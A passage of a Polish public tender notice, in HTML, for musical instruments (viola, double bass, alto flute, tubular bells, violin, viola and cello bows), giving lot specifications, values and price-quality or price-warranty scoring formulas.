class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Altówka klasy mistrzowskiej wykonana przez Tadeusz Rapacz, Dariusz Korcz lub równoważna posiadająca następujące cechy:<br/>• płyta wierzchnia: świerkowa,<br/>• płyta spodnia: jaworowa,<br/>• boczki: jaworowe,<br/>• szyjka: jaworowa,<br/>• lakier: pomarańczowo-brązowy,<br/>• długość 420 mm, <br/>• szerokość górą 205 mm, <br/>• szerokość CC 145 mm, <br/>• szerokość dołem 251 mm,<br/>• data wykonania: ok. 2020 r.<br/>• futerał BAM lub równoważny. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 25000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wyboru najkorzystniejszej oferty dokona Komisja przetargowa na podstawie porównania cen ofert oraz jakości instrumentów ocenionych przez powołanych biegłych.<br/>Wybór będzie dokonany na podstawie następujących kryteriów:<br/>a) cena (C)	- 40 %<br/>b) jakość	(J)	- 60 %<br/><br/>Zasady przyznawania punktów: <br/>a)	Punktacja za oferowaną cenę (C): <br/><br/> min. wartość zaproponowana w ofertach<br/>C = ------------------------------------------------------------------------- x 100 pkt <br/> wartość w badanej ofercie<br/><br/>b)	Punktacja za jakość (J) obejmuje następujące elementy: <br/>i) Intonacja: wysokość dźwięku określana pod kątem sprawdzenia równych stosunków częstotliwości (interwałów), mierzona poprzez badanie przyrządem pomiaru częstotliwości fali akustycznej. <br/>do 10 centów 20 pkt<br/>od 10 do 25 centów 10 pkt<br/>powyżej 25 centów 0 pkt <br/>Maksymalna dopuszczalna wartość centów = 25<br/>ii) Wyrównanie brzmienia: Sprawdzenie pasma tonów harmonicznych dźwięku określone oceną na podstawie analizy wrażenia słuchowego muzyków, w całej skali instrumentu. Zgodność długości brzmienia i głośności na każdym poziomie skali instrumentu.<br/>wyrównany 40 pkt<br/>średnio wyrównany 20 pkt<br/>niewyrównany 0 pkt<br/>Minimalna dopuszczalna ilość punktów =20.<br/>iii) Barwa: ocena aspektów barwy na podstawie analizy wrażenia barwy zdefiniowanego semantycznym opisem. <br/>ciepła 0 - 4 pkt <br/>czysta 0 - 4 pkt <br/>głęboka 0 - 4 pkt <br/>jasna 0 - 4 pkt <br/>nośna 0 - 4 pkt <br/>Minimalna dopuszczalna ilość punktów w każdym z powyższych podkryteriów = 2.<br/>iv) Precyzja mechaniki : właściwa precyzja mechaniki charakterystyczna dla danego rodzaju instrumentu.<br/>maksymalnie właściwa precyzja mechaniki 20 pkt <br/>średnia precyzja mechaniki 10 pkt <br/>brak właściwej precyzji mechaniki 0 pkt <br/>Minimalna dopuszczalna ilość punktów = 10.<br/>Ocena za jakość dokonywana jest w pełnych punktach.<br/>Ogólna punktacja za jakość : J = Ji+Jii+Jiii+Jiv<br/>Oceny każdego z instrumentów będzie dokonywać dwóch wskazanych przez Zamawiającego biegłych. <br/>Wykonawca udostępni biegłym instrumenty w uzgodnionym miejscu i czasie w celu dokonania oceny wg kryterium „jakość”. Udostępnione instrumenty powinny być tożsame z oferowanymi. <br/>Na podstawie opinii biegłych członkowie komisji przetargowej przydzielą każdej ocenianej ofercie punkty w kryterium „jakość” w skali jak wyżej. <br/>Ocena końcowa oferty W zostanie wyliczona ze wzoru: W= C x 40% + J x 60%<br/>gdzie: W	- wynik ostateczny oceny oferty<br/>C	- wynik za kryterium cena wyliczony zgodnie ze wzorem podanym w pkt a)<br/>J	- wynik za kryterium jakość wyliczony zgodnie ze wzorem podanym w pkt b)<br/>Wynik oceny zostanie zaokrąglony do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Kontrabas lutniczy mistrzowski 5 strunowy z warsztatu Poellmann wykonany przez Krahmer model Cremona 5/4 mensura struny drgającej 107 z pozycją na &#34;D&#34; lub równoważny posiadający następujące cechy:<br/>• płyta wierzchnia świerkowa o regularnych szerokich przyrostach <br/>• płyta spodnia jednoczęściowa z jaworu kaukaskiego <br/>• lakierowanie specjalistyczne na sposób antyczny Poellmann lub równoważne <br/>• zbudowany w roku 2023<br/>• mechanika kuta<br/>• strunociąg cięty hebanowy fazowany <br/>• struny Pirastro lub równoważne<br/>• szerokość górą 53 cm <br/>• szerokość dołem 73 cm <br/>• długość pudla 118 cm </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 100000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37313900-4 - Kontrabasy</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wyboru najkorzystniejszej oferty dokona Komisja przetargowa na podstawie porównania cen ofert oraz jakości instrumentów ocenionych przez powołanych biegłych.<br/>Wybór będzie dokonany na podstawie następujących kryteriów:<br/>a) cena (C)	- 40 %<br/>b) jakość	(J)	- 60 %<br/><br/>Zasady przyznawania punktów: <br/>a)	Punktacja za oferowaną cenę (C): <br/><br/> min. wartość zaproponowana w ofertach<br/>C = ------------------------------------------------------------------------- x 100 pkt <br/> wartość w badanej ofercie<br/><br/>b)	Punktacja za jakość (J) obejmuje następujące elementy: <br/>i) Intonacja: wysokość dźwięku określana pod kątem sprawdzenia równych stosunków częstotliwości (interwałów), mierzona poprzez badanie przyrządem pomiaru częstotliwości fali akustycznej. <br/>do 10 centów 20 pkt<br/>od 10 do 25 centów 10 pkt<br/>powyżej 25 centów 0 pkt <br/>Maksymalna dopuszczalna wartość centów = 25<br/>ii) Wyrównanie brzmienia: Sprawdzenie pasma tonów harmonicznych dźwięku określone oceną na podstawie analizy wrażenia słuchowego muzyków, w całej skali instrumentu. Zgodność długości brzmienia i głośności na każdym poziomie skali instrumentu.<br/>wyrównany 40 pkt<br/>średnio wyrównany 20 pkt<br/>niewyrównany 0 pkt<br/>Minimalna dopuszczalna ilość punktów =20.<br/>iii) Barwa: ocena aspektów barwy na podstawie analizy wrażenia barwy zdefiniowanego semantycznym opisem. <br/>ciepła 0 - 4 pkt <br/>czysta 0 - 4 pkt <br/>głęboka 0 - 4 pkt <br/>jasna 0 - 4 pkt <br/>nośna 0 - 4 pkt <br/>Minimalna dopuszczalna ilość punktów w każdym z powyższych podkryteriów = 2.<br/>iv) Precyzja mechaniki : właściwa precyzja mechaniki charakterystyczna dla danego rodzaju instrumentu.<br/>maksymalnie właściwa precyzja mechaniki 20 pkt <br/>średnia precyzja mechaniki 10 pkt <br/>brak właściwej precyzji mechaniki 0 pkt <br/>Minimalna dopuszczalna ilość punktów = 10.<br/>Ocena za jakość dokonywana jest w pełnych punktach.<br/>Ogólna punktacja za jakość : J = Ji+Jii+Jiii+Jiv<br/>Oceny każdego z instrumentów będzie dokonywać dwóch wskazanych przez Zamawiającego biegłych. <br/>Wykonawca udostępni biegłym instrumenty w uzgodnionym miejscu i czasie w celu dokonania oceny wg kryterium „jakość”. Udostępnione instrumenty powinny być tożsame z oferowanymi. <br/>Na podstawie opinii biegłych członkowie komisji przetargowej przydzielą każdej ocenianej ofercie punkty w kryterium „jakość” w skali jak wyżej. <br/>Ocena końcowa oferty W zostanie wyliczona ze wzoru: W= C x 40% + J x 60%<br/>gdzie: W	- wynik ostateczny oceny oferty<br/>C	- wynik za kryterium cena wyliczony zgodnie ze wzorem podanym w pkt a)<br/>J	- wynik za kryterium jakość wyliczony zgodnie ze wzorem podanym w pkt b)<br/>Wynik oceny zostanie zaokrąglony do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Flet altowy klasy mistrzowskiej posiadający następujące cechy:<br/>• wykonany ze srebra próby 925<br/>• z prostą główką z ergonomicznym mechanizmem, <br/>• korpus i stopka - srebrne, <br/>• mechanizm posrebrzany, <br/>• wyciągane kominki,<br/>• strój A=442,<br/>• wysunięta klapa G, <br/>• E-mechanika, <br/>• stopka C </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 32000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wyboru najkorzystniejszej oferty dokona Komisja przetargowa na podstawie porównania cen ofert oraz jakości instrumentów ocenionych przez powołanych biegłych.<br/>Wybór będzie dokonany na podstawie następujących kryteriów:<br/>a) cena (C)	- 40 %<br/>b) jakość	(J)	- 60 %<br/><br/>Zasady przyznawania punktów: <br/>a)	Punktacja za oferowaną cenę (C): <br/><br/> min. wartość zaproponowana w ofertach<br/>C = ------------------------------------------------------------------------- x 100 pkt <br/> wartość w badanej ofercie<br/><br/>b)	Punktacja za jakość (J) obejmuje następujące elementy: <br/>i) Intonacja: wysokość dźwięku określana pod kątem sprawdzenia równych stosunków częstotliwości (interwałów), mierzona poprzez badanie przyrządem pomiaru częstotliwości fali akustycznej. <br/>do 10 centów 20 pkt<br/>od 10 do 25 centów 10 pkt<br/>powyżej 25 centów 0 pkt <br/>Maksymalna dopuszczalna wartość centów = 25<br/>ii) Wyrównanie brzmienia: Sprawdzenie pasma tonów harmonicznych dźwięku określone oceną na podstawie analizy wrażenia słuchowego muzyków, w całej skali instrumentu. Zgodność długości brzmienia i głośności na każdym poziomie skali instrumentu.<br/>wyrównany 40 pkt<br/>średnio wyrównany 20 pkt<br/>niewyrównany 0 pkt<br/>Minimalna dopuszczalna ilość punktów =20.<br/>iii) Barwa: ocena aspektów barwy na podstawie analizy wrażenia barwy zdefiniowanego semantycznym opisem. <br/>ciepła 0 - 4 pkt <br/>czysta 0 - 4 pkt <br/>głęboka 0 - 4 pkt <br/>jasna 0 - 4 pkt <br/>nośna 0 - 4 pkt <br/>Minimalna dopuszczalna ilość punktów w każdym z powyższych podkryteriów = 2.<br/>iv) Precyzja mechaniki : właściwa precyzja mechaniki charakterystyczna dla danego rodzaju instrumentu.<br/>maksymalnie właściwa precyzja mechaniki 20 pkt <br/>średnia precyzja mechaniki 10 pkt <br/>brak właściwej precyzji mechaniki 0 pkt <br/>Minimalna dopuszczalna ilość punktów = 10.<br/>Ocena za jakość dokonywana jest w pełnych punktach.<br/>Ogólna punktacja za jakość : J = Ji+Jii+Jiii+Jiv<br/>Oceny każdego z instrumentów będzie dokonywać dwóch wskazanych przez Zamawiającego biegłych. <br/>Wykonawca udostępni biegłym instrumenty w uzgodnionym miejscu i czasie w celu dokonania oceny wg kryterium „jakość”. Udostępnione instrumenty powinny być tożsame z oferowanymi. <br/>Na podstawie opinii biegłych członkowie komisji przetargowej przydzielą każdej ocenianej ofercie punkty w kryterium „jakość” w skali jak wyżej. <br/>Ocena końcowa oferty W zostanie wyliczona ze wzoru: W= C x 40% + J x 60%<br/>gdzie: W	- wynik ostateczny oceny oferty<br/>C	- wynik za kryterium cena wyliczony zgodnie ze wzorem podanym w pkt a)<br/>J	- wynik za kryterium jakość wyliczony zgodnie ze wzorem podanym w pkt b)<br/>Wynik oceny zostanie zaokrąglony do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2 dzwony rurowe o zakresie 1,6 i 0,5 oktawy wraz z ramami:<br/>1.	Adams Philharmonic BKL 5216 lub równoważny:<br/>• liczba rur: 20;<br/>• w komplecie 2 młotki i pokrowiec<br/>2.	Adams Philharmonic BKL 5200 lub równoważny:<br/>• liczba rur: 7;<br/>• w komplecie 2 młotki i pokrowiec<br/>3.	Adams Philharmonic Gen 2 Frame 2BKIIF05H lub równoważny:<br/>• obsługa do 7 rur dzwonów;<br/>• regulacja wysokości;<br/>• pedał do tłumienia;<br/>• podwójne koła transportowe z hamulcami. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 65000 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37316000-6 - Instrumenty perkusyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wyboru najkorzystniejszej oferty dokona Komisja przetargowa na podstawie porównania cen ofert oraz jakości instrumentów ocenionych przez powołanych biegłych.<br/>Wybór będzie dokonany na podstawie następujących kryteriów:<br/>a) cena (C)	- 40 %<br/>b) jakość	(J)	- 60 %<br/><br/>Zasady przyznawania punktów: <br/>a)	Punktacja za oferowaną cenę (C): <br/><br/> min. wartość zaproponowana w ofertach<br/>C = ------------------------------------------------------------------------- x 100 pkt <br/> wartość w badanej ofercie<br/><br/>b)	Punktacja za jakość (J) obejmuje następujące elementy: <br/>i) Intonacja: wysokość dźwięku określana pod kątem sprawdzenia równych stosunków częstotliwości (interwałów), mierzona poprzez badanie przyrządem pomiaru częstotliwości fali akustycznej. <br/>do 10 centów 20 pkt<br/>od 10 do 25 centów 10 pkt<br/>powyżej 25 centów 0 pkt <br/>Maksymalna dopuszczalna wartość centów = 25<br/>ii) Wyrównanie brzmienia: Sprawdzenie pasma tonów harmonicznych dźwięku określone oceną na podstawie analizy wrażenia słuchowego muzyków, w całej skali instrumentu. Zgodność długości brzmienia i głośności na każdym poziomie skali instrumentu.<br/>wyrównany 40 pkt<br/>średnio wyrównany 20 pkt<br/>niewyrównany 0 pkt<br/>Minimalna dopuszczalna ilość punktów =20.<br/>iii) Barwa: ocena aspektów barwy na podstawie analizy wrażenia barwy zdefiniowanego semantycznym opisem. <br/>ciepła 0 - 4 pkt <br/>czysta 0 - 4 pkt <br/>głęboka 0 - 4 pkt <br/>jasna 0 - 4 pkt <br/>nośna 0 - 4 pkt <br/>Minimalna dopuszczalna ilość punktów w każdym z powyższych podkryteriów = 2.<br/>iv) Precyzja mechaniki : właściwa precyzja mechaniki charakterystyczna dla danego rodzaju instrumentu.<br/>maksymalnie właściwa precyzja mechaniki 20 pkt <br/>średnia precyzja mechaniki 10 pkt <br/>brak właściwej precyzji mechaniki 0 pkt <br/>Minimalna dopuszczalna ilość punktów = 10.<br/>Ocena za jakość dokonywana jest w pełnych punktach.<br/>Ogólna punktacja za jakość : J = Ji+Jii+Jiii+Jiv<br/>Oceny każdego z instrumentów będzie dokonywać dwóch wskazanych przez Zamawiającego biegłych. <br/>Wykonawca udostępni biegłym instrumenty w uzgodnionym miejscu i czasie w celu dokonania oceny wg kryterium „jakość”. Udostępnione instrumenty powinny być tożsame z oferowanymi. <br/>Na podstawie opinii biegłych członkowie komisji przetargowej przydzielą każdej ocenianej ofercie punkty w kryterium „jakość” w skali jak wyżej. <br/>Ocena końcowa oferty W zostanie wyliczona ze wzoru: W= C x 40% + J x 60%<br/>gdzie: W	- wynik ostateczny oceny oferty<br/>C	- wynik za kryterium cena wyliczony zgodnie ze wzorem podanym w pkt a)<br/>J	- wynik za kryterium jakość wyliczony zgodnie ze wzorem podanym w pkt b)<br/>Wynik oceny zostanie zaokrąglony do dwóch miejsc po przecinku.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Jakość</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 7</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Smyczki historyczne - 15 szt. różnych:<br/><br/>Smyczek skrzypcowy Kurt Schmidt lub równoważny<br/>Smyczek skrzypcowy C. Hans Karl Schmidt lub równoważny<br/>Smyczek skrzypcowy Franz Albert Hermann lub równoważny<br/>Smyczek skrzypcowy Nürnberger lub równoważny<br/>Smyczek skrzypcowy Bernd Dölling lub równoważny<br/>Smyczek skrzypcowy Adolf C Schuster lub równoważny<br/>Smyczek skrzypcowy B. Michael Dölling lub równoważny<br/>Smyczek skrzypcowy V.J. Ferelli szkoły francuskiej Laberte lub równoważny<br/>Smyczek skrzypcowy F. K. Müller lub równoważny<br/>Smyczek skrzypcowy Manoel Francisco lub równoważny<br/><br/>Smyczek altówkowy Szkoły niemieckiej, niesygnowany<br/>Smyczek altówkowy G. Rudi Steinel (złoto) lub równoważny<br/>Smyczek altówkowy V.J. Ferelli szkoły francuskiej Laberte lub równoważny<br/><br/>Smyczek wiolonczelowy B. Michael Dölling lub równoważny<br/>Smyczek wiolonczelowy L. Morizot lub równoważny<br/><br/>Szczegółowy opis smyczków znajduje się w załączniku nr 1 do SWZ - Opisie Przedmiotu Zamówienia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 276500 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37310000-4 - Instrumenty muzyczne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">37320000-7 - Części i akcesoria do instrumentów muzycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">4 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Wybór będzie dokonany na podstawie następujących kryteriów:<br/>a) ceny (C) – 60 %<br/>b) okresu gwarancji (G) – 40 %<br/> Zamawiający przyjmuje zasadę, że 1 % odpowiada 1 punktowi<br/><br/>Zasady przyznawania punktów: <br/>a)	Punktacja za oferowaną cenę (C): <br/><br/> min. wartość zaproponowana w ofertach<br/>C = ------------------------------------------------------------------------- x 100 pkt <br/> wartość w badanej ofercie<br/><br/>b)	Punktacja za oferowany okres gwarancji w miesiącach (G): <br/><br/> okres gwarancji w badanej ofercie (m-ce)<br/>G = ----------------------------------------------------------------------- x 100 pkt <br/> maksymalny oferowany okres gwarancji (m-ce)<br/><br/>Minimalny wymagany okres gwarancji wynosi 24 miesiące <br/>Maksymalny dopuszczalny okres gwarancji wynosi 48 miesięcy<br/>Ocena końcowa oferty W zostanie wyliczona ze wzoru: <br/>W = C x 60% + G x 40%<br/>gdzie: W - wynik ostateczny oceny oferty <br/>C - punkty za kryterium cena wyliczone zgodnie ze wzorem w pkt a)<br/>G - punkty za kryterium okres gwarancji wyliczone zgodnie ze wzorem w pkt b)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 8</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Smyczki skrzypcowe, altówkowe i wiolonczelowe - nowe.<br/><br/>1.1. Smyczek skrzypcowy Dörfler*** (złoto) lub równoważny<br/>Drewno: fernambuk; <br/>Pręt: okrągły;<br/>Lakier: spirytusowy, kolor orzechowo-ciepły brąz;<br/>Żabka: hebanowa z paryskim oczkiem złotym;<br/>Śrubka: 3-częściowa złota z ozdobnymi częściami z masy irysowej przedzielonymi wstawkami z hebanu; <br/>Zasuwka: wyrazista złota rybka;<br/>Owijka: złota przeplatana z francuską nitką grey;<br/>Skórka: naturalna wytłaczana brązowa;<br/>Włosie naturalne;<br/>Waga: ok. 61 g<br/><br/>1.2. Smyczek skrzypcowy Mazur (bez sygnatury) lub równoważny<br/>Drewno: wysokojakościowy fernambuk;<br/>Lakier: koloru jasnobrązowego z odcieniem czerwieni;<br/>Kostka główki: imitacja kości;<br/>Żabka: hebanowa;<br/>Śrubka: 3-częściowa srebrna;<br/>Okucia: srebrne;<br/>Owijka: srebrna nić francuska przeplatana nicią czarną;<br/>Waga: ok. 62 g<br/><br/>1.3. Smyczek skrzypcowy Arcus T6 lub równoważny<br/>Pręt: karbonowy okrągły czarny;<br/>Żabka: drewno wężowe ze srebrnym okręgiem;<br/>Śrubka: 3-częściowa srebro z drewnem wężowym;<br/>Skuwka: srebrna;<br/>Zasuwka: złota rybka;<br/>Owijka typu fischbein czarna ze srebrnym drucikiem;<br/>Skórka: naturalna wytłaczana brązowa;<br/>Włosie: naturalne;<br/>Waga: ok. 53 g<br/><br/>2.1. Smyczek altówkowy Knoll*** lub równoważny<br/>Drewno: fernambuk;<br/>Pręt: ośmiokątny;<br/>Lakier: spirytusowy, kolor ciemny brąz;<br/>Żabka: hebanowa z paryskim oczkiem;<br/>Śrubka: 3-częściowa srebrna;<br/>Skuwka: srebrna;<br/>Zasuwka: złota rybka;<br/>Owijka: srebrna;<br/>Skórka: gładka czarna naturalna;<br/>Kostka na główce: kość;<br/>Włosie: naturalne;<br/>Waga: ok. 72 g<br/><br/>2.2. Smyczek altówkowy Andreas Uebel lub równoważny<br/>Drewno: fernambuk;<br/>Pręt: okrągły;<br/>Lakier: spirytusowy, kolor orzechowo-brązowy;<br/>Żabka: hebanowa z paryskim oczkiem;<br/>Śrubka: 3-częściowa srebrna;<br/>Skuwka: srebrna;<br/>Zasuwka: irys/ złota rybka;<br/>Skórka: naturalna gładka czarna;<br/>Włosie: naturalne;<br/>Waga: ok. 73 g<br/><br/>3.1. Smyczek wiolonczelowy Dörfler*** lub równoważny<br/>Drewno: fernambuk; <br/>Pręt: okrągły;<br/>Lakier: spirytusowy, kolor brązowy;<br/>Żabka: hebanowa z paryskim oczkiem;<br/>Śrubka: 3-częściowa srebro z hebanem;<br/>Skuwka: 